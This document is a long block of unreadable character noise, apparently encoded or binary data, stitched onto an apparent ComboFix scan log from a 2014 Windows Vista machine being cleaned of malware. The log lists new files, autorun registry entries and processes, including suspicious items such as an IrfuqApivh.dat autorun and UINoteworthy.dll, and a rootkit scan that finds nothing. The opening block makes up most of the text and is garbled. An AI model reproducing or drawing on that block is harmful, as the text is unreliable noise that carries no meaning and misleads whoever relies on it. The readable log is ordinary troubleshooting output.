J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&JzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-07-24 to 2014-08-24  )))))))))))))))))))))))))))))))
.
.
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-24 15:40
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\Dell\DellDock\DockLogin.exe
c:\windows\system32\WLANExt.exe
c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\AVG\AVG10\avgfws.exe
c:\program files\AVG\AVG10\avgwdsvc.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\dwrcs\DWRCS.EXE
c:\windows\system32\lxblcoms.exe
c:\windows\system32\msiexec.exe
c:\program files\HTC\Internet Pass-Through\PassThruSvr.exe
c:\program files\Sony\PMB\PMBDeviceInfoProvider.exe
c:\program files\NETGEAR\WNA1100\WifiSvc.exe
c:\windows\system32\WUDFHost.exe
c:\program files\AVG\AVG10\avgnsx.exe
c:\program files\Dell\DellDock\DellDock.exe
c:\program files\Glary Utilities 5\Integrator.exe
c:\windows\RtHDVCpl.exe
c:\windows\System32\rundll32.exe
c:\program files\ActivIdentity\ActivClient\acsagent.exe
c:\program files\HP\Digital Imaging\bin\hpqtra08.exe
c:\program files\NETGEAR\WNA1100\WNA1100.exe
c:\program files\Microsoft Office\Office12\ONENOTEM.EXE
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\windows\ehome\ehmsas.exe
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe
